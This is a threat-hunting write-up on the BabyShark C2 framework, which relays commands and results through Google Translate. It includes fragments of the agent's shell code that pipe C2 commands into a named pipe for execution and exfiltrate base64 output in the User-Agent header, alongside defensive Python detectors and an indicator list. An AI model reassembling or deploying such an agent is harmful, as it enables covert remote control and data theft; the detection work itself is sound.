Understanding & Detecting C2 Frameworks — BabyShark

BabyShark

Google Translate as a proxy

https://translate.google.com/translate?&anno=2&u=[URL OF WEB PAGE]
It looks nice :D
Inspecting the source
https://y7t5ywjrrsywzq4aeo6x7rzg7u-b25orc35okxta-nasbench-medium-com.translate.goog/
Looks even better :D

C2 Server (app.py)

“BabyShark” main interface
Web Routes

home (“/”)

“/” Route
Results interface

getcommand (“/momyshark”)

“getcommand” Function
password = 'b4bysh4rk'
Redirect page
<meta http-equiv="refresh" content="0; url=https://www.youtube.com/watch?v=6aE0psDCIow">
Redirected YouTube video
result = request.headers.get('User-Agent').split('|')
if len(result) >= 2:
[Extract Results]
[Send Commands]
Mommy Shark ?
HTML source of Mommy Shark

create (“/create-task”)

“create” Function

done & delete

  • command (id, cmd, done)
  • results (id, results)
Database Tables
“done” Function
“delete” Function

Example Agent

“Agent.sh”
running=true
secretkey="b4bysh4rk"
user_agent="User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36"
data="Content-Hype: "
c2server="http://babyshark/momyshark?key=$secretkey"
result=""
input="/tmp/input"
output="/tmp/output"

namedpipe

“namedpipe” Function
input="/tmp/input"
output="/tmp/output"
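A host-side counterpart to this section, added for this write-up and not code from the BabyShark project: the agent creates /tmp/input as a named pipe (mkfifo) and writes task output to /tmp/output, so a responder can test a host for exactly that pair and, to avoid false positives on an unrelated file that happens to share the name, require the file type to match. The base_dir parameter is an assumption made so the check can be pointed at a test directory; make_test_dir is a constructed helper that reproduces the two artifacts in a temporary directory.

```python
"""Check a host for the BabyShark agent's named pipe and output file.

Added example for this write-up, not code from the BabyShark project.
The agent creates /tmp/input as a named pipe (mkfifo) and writes task
output to /tmp/output; both paths are taken from the agent source in the
article. base_dir is an assumed parameter so the check can be pointed at
a test directory; make_test_dir is a constructed helper for that.
"""
import os
import stat
import tempfile

# (file name, expected file type, what the agent uses it for)
AGENT_ARTIFACTS = [
    ("input", stat.S_IFIFO, "named pipe the agent reads commands from"),
    ("output", stat.S_IFREG, "file the agent captures command output in"),
]


def check_agent_artifacts(base_dir="/tmp"):
    """Return [(name, description)] for artifacts present with the expected type."""
    findings = []
    for name, expected_type, description in AGENT_ARTIFACTS:
        path = os.path.join(base_dir, name)
        try:
            st = os.lstat(path)
        except FileNotFoundError:
            continue
        # A regular file called 'input' is not the agent's pipe; the type must match.
        if stat.S_IFMT(st.st_mode) == expected_type:
            findings.append((name, description))
    return findings


def make_test_dir(infected):
    """Constructed helper: a temporary directory that does or does not contain
    the artifact pair, so the check can be exercised without a real agent."""
    base_dir = tempfile.mkdtemp(prefix="babyshark-check-")
    if infected:
        os.mkfifo(os.path.join(base_dir, "input"))
        with open(os.path.join(base_dir, "output"), "w") as fh:
            fh.write("captured command output would appear here\n")
    return base_dir


if __name__ == "__main__":
    for name, description in check_agent_artifacts("/tmp"):
        print("/tmp/%s: %s" % (name, description))
```

Run without arguments the script inspects the real /tmp; the type check is the important part, since /tmp/input and /tmp/output are generic enough names that only the FIFO plus regular file combination is a meaningful match.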

main

“main” Function

talktotranslate

“talktotranslate” Function

getfirsturl

“getfirsturl” Function
https://translate.google.com/translate?&anno=2&u=http://babyshark/momyshark?key=b4bysh4rk
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36

getsecondurl

“getsecondurl” Function
https://translate.googleusercontent.com/translate_p?anno=2&u=http://babyshark/momyshark?key=b4bysh4rk&depth=1&rurl=translate.google.com&sp=nmt4&pto=aue,ajax,boq&usg=[Random String]
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36

getcommand

HTML source of Mommy Shark
command=$(echo "$command" | xmllint --html --xpath '/html/body/main/div/div/div/div/ul/li/span/text()' - 2>/dev/null )
echo $command
pwd # 1
Going back to main
# Extract the ID
idcommand=$(echo $command | cut -d '#' -f2)
# Send command to the named pipe for execution
echo "$command" > "$input"
# Sleep for 2 seconds
sleep 2
# Read the output from the file and encode it to Base64
outputb64=$(cat $output | tr -d '\000' | base64 | tr -d '\n' 2>/dev/null)
result="$user_agent | $outputb64 | $idcommand "
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36 | L2hvbWUvbi90b29scy9CYWJ5U2hhcmsK | 1
  1. The agent starts by creating a named pipe and an output file, used to execute the commands sent by the C2 and to save their output.
  2. It sends a request to Google Translate with the C2 server URL as the page to translate, by calling the “talktotranslate” function.
  3. It receives the new URL of the “translated” C2 page.
  4. It extracts the command from the HTML source.
  5. It sends the command to the named pipe for execution.
  6. It encodes the output to Base64.
  7. It concatenates the USER-AGENT with the OUTPUT and the command ID.
  8. It requests the “google-translate” server again using the newly generated USER-AGENT, which carries the result back to the C2.
  9. It repeats until it receives the “exit” command.
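Putting the agent's behaviour to defensive use, the following is an added example (not code from the BabyShark project or from the article) that checks web-proxy log entries for the traffic described above: a direct request to the /momyshark?key= route, the same route wrapped in the u= parameter of a translate.google.com or translate.googleusercontent.com request, the default User-Agent, and the “User-Agent | base64 output | task id” header the agent uses to return results, which it decodes so the analyst can see what was exfiltrated. The tab-separated log format and the three SAMPLE_LOG lines are constructed for the example, and usg=PLACEHOLDER stands in for the random string Google appends.

```python
"""Match BabyShark indicators against web-proxy log entries.

Added example for this write-up; it is not code from the BabyShark
project. The indicators (default User-Agent, the /momyshark?key= route,
the Google Translate wrapping and the 'UA | base64 output | task id'
result format) are taken from the article. The tab-separated log format
and the SAMPLE_LOG lines are constructed; usg=PLACEHOLDER stands in for
the random string Google appends.
"""
import base64
import binascii
from urllib.parse import parse_qs, urlsplit

BABYSHARK_UA = ("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 "
                "(KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36")
DEFAULT_KEY = "b4bysh4rk"
TRANSLATE_HOSTS = {"translate.google.com", "translate.googleusercontent.com"}


def is_c2_url(url):
    """True for the agent's check-in route, e.g. http://C2/momyshark?key=..."""
    parts = urlsplit(url)
    query = parse_qs(parts.query, keep_blank_values=True)
    return parts.path.endswith("/momyshark") and "key" in query


def decode_result_header(user_agent):
    """Parse the 'UA | <base64 output> | <task id>' header the agent sends
    after running a task. Returns (output, task_id) or None."""
    fields = [f.strip() for f in user_agent.split("|")]
    if len(fields) < 3 or fields[0] != BABYSHARK_UA:
        return None
    try:
        output = base64.b64decode(fields[1], validate=True)
    except (binascii.Error, ValueError):
        return None
    return output.decode("utf-8", "replace"), fields[2]


def analyse_request(url, user_agent):
    """Return the reasons (possibly none) a request looks like BabyShark."""
    reasons = []
    parts = urlsplit(url)
    query = parse_qs(parts.query, keep_blank_values=True)
    if is_c2_url(url):
        reasons.append("direct request to the /momyshark?key= route")
        if query["key"][0] == DEFAULT_KEY:
            reasons.append("default secret key in use")
    elif parts.hostname in TRANSLATE_HOSTS:
        # The agent hands the C2 URL to Google Translate in the u= parameter.
        target = query.get("u", [""])[0]
        if is_c2_url(target):
            reasons.append("C2 route proxied through Google Translate: " + target)
    if user_agent.strip() == BABYSHARK_UA:
        reasons.append("BabyShark default User-Agent")
    decoded = decode_result_header(user_agent)
    if decoded is not None:
        output, task_id = decoded
        reasons.append("task %s output returned in User-Agent: %r" % (task_id, output))
    return reasons


def scan_log(text):
    """Return [(timestamp, client, reasons)] for log lines that match."""
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, _method, url, ua = line.split("\t", 4)
        reasons = analyse_request(url, ua)
        if reasons:
            hits.append((ts, client, reasons))
    return hits


# Constructed log lines: timestamp, client, method, URL, User-Agent (tab-separated).
SAMPLE_LOG = (
    "2023-01-01T00:00:00Z\t10.0.0.5\tGET\t"
    "https://translate.google.com/translate?&anno=2&u=http://babyshark/momyshark?key=b4bysh4rk\t"
    + BABYSHARK_UA + "\n"
    "2023-01-01T00:00:12Z\t10.0.0.5\tGET\t"
    "https://translate.googleusercontent.com/translate_p?anno=2&u=http://babyshark/momyshark"
    "?key=b4bysh4rk&depth=1&rurl=translate.google.com&sp=nmt4&pto=aue,ajax,boq&usg=PLACEHOLDER\t"
    + BABYSHARK_UA + " | L2hvbWUvbi90b29scy9CYWJ5U2hhcmsK | 1 \n"
    "2023-01-01T00:00:15Z\t10.0.0.7\tGET\thttps://www.example.com/index.html\t"
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/100.0\n"
)

if __name__ == "__main__":
    for ts, client, reasons in scan_log(SAMPLE_LOG):
        print(ts, client)
        for reason in reasons:
            print("  -", reason)
```

The u= parameter is read with parse_qs rather than a substring match because the C2 URL inside it contains its own ?key= query; parse_qs splits on & only, so the nested query survives intact and is_c2_url can be applied to the inner URL exactly as it is to a direct request.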

Conclusion

Indicators

  • User-Agent : Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
  • “/tmp/input” & “/tmp/output” will be created on infected hosts
  • 10 second delay by default between the different batches of requests to Google Translate
  • URL : “C2_IP/momyshark?key=”
  • Default Secret Key : b4bysh4rk
  • Binaries executed : “curl”, “base64”, “xmllint”, “mkfifo”, “cut”, “tr”, “sed”, “echo”, “cat” (See source above for arguments)
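The 10 second default delay listed above is also usable on its own as a behavioural indicator, independent of the User-Agent or key. As an added example (not code from the BabyShark project), the function below groups requests to translate.google.com per client, since each batch of agent requests starts there, and flags clients whose gaps between those requests cluster tightly around the expected interval. The (client, epoch seconds, hostname) event format is an assumption, and SAMPLE_EVENTS is constructed data.

```python
"""Flag clients that contact Google Translate at BabyShark's beacon interval.

Added example for this write-up, not code from the BabyShark project. The
only fact taken from the article is the agent's default 10 second sleep
between batches of requests; each batch starts with a request to
translate.google.com, so those requests are used as the beacon marker.
The (client, epoch seconds, hostname) event tuples are an assumed input
format, and SAMPLE_EVENTS is constructed data.
"""
import statistics

BEACON_INTERVAL = 10.0   # seconds, BabyShark's default delay between batches
BATCH_START_HOST = "translate.google.com"


def beacon_candidates(events, expected=BEACON_INTERVAL, tolerance=1.0, min_beacons=4):
    """Return {client: (beacon_count, median_gap)} for clients whose requests
    to translate.google.com recur at roughly the expected interval."""
    by_client = {}
    for client, ts, host in events:
        if host == BATCH_START_HOST:
            by_client.setdefault(client, []).append(ts)
    flagged = {}
    for client, times in by_client.items():
        if len(times) < min_beacons:
            continue
        times.sort()
        gaps = [later - earlier for earlier, later in zip(times, times[1:])]
        median_gap = statistics.median(gaps)
        jitter = statistics.pstdev(gaps)
        # Regular gaps close to the default sleep; a browsing user is far noisier.
        if abs(median_gap - expected) <= tolerance and jitter <= tolerance:
            flagged[client] = (len(times), median_gap)
    return flagged


# Constructed events: 10.0.0.5 beacons every ~10 s (each batch followed by the
# translate.googleusercontent.com request); 10.0.0.7 is ordinary browsing.
SAMPLE_EVENTS = [
    ("10.0.0.5", 1000.0, "translate.google.com"),
    ("10.0.0.5", 1000.4, "translate.googleusercontent.com"),
    ("10.0.0.5", 1010.2, "translate.google.com"),
    ("10.0.0.5", 1010.6, "translate.googleusercontent.com"),
    ("10.0.0.5", 1020.1, "translate.google.com"),
    ("10.0.0.5", 1020.5, "translate.googleusercontent.com"),
    ("10.0.0.5", 1030.3, "translate.google.com"),
    ("10.0.0.5", 1030.7, "translate.googleusercontent.com"),
    ("10.0.0.5", 1040.2, "translate.google.com"),
    ("10.0.0.7", 1000.0, "translate.google.com"),
    ("10.0.0.7", 1037.0, "translate.google.com"),
    ("10.0.0.7", 1120.0, "translate.google.com"),
    ("10.0.0.7", 1125.0, "translate.google.com"),
    ("10.0.0.7", 1300.0, "www.example.com"),
]

if __name__ == "__main__":
    for client, (count, gap) in beacon_candidates(SAMPLE_EVENTS).items():
        print("%s: %d beacons, median gap %.1f s" % (client, count, gap))
```

The median and the population standard deviation are used rather than the mean so that a single missed or delayed beacon does not pull the estimate away from the true interval; the tolerance and min_beacons parameters are the knobs to tune against the noise level of the environment's own Google Translate usage.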

MITRE ATT&CK


I write about #ThreatHunting #WindowsInternals #Malware #DFIR and occasionally #Python.


Nasreddine Bencherchali
